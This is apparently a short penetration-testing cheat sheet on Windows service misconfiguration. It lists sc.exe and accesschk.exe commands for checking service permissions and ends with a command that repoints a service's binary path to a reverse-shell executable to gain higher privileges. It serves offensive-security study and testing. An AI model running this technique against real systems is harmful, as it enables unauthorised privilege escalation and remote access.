# Service Exploitation

### Basic Commands

```powershell
# Query the configuration of a service
sc.exe qc $service_name

# Query the current status of a service
sc.exe query $service_name

# Modify an option on a service
sc.exe config $service_name $option= $value

# Start and stop a service
net start/stop $service_name
```

### Accesschk.exe

#### Use [Accesschk.exe](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) to validate service permissions:

```powershell
.\accesschk.exe /accepteula -uwcqv user $service_name
```

* What we are looking for in the output is the `SERVICE_START` and `SERVICE_STOP` permissions.
* We also want to confirm that it is running under a user with higher privileges (e.g., `LocalSystem`)

### Notes

* Validate if you can start/stop the service or the machine. If you cannot then you may not be able to use it to escalate your privileges.
* Check if we can reboot the system with `whoami /priv`
* An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:

```powershell
sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""
```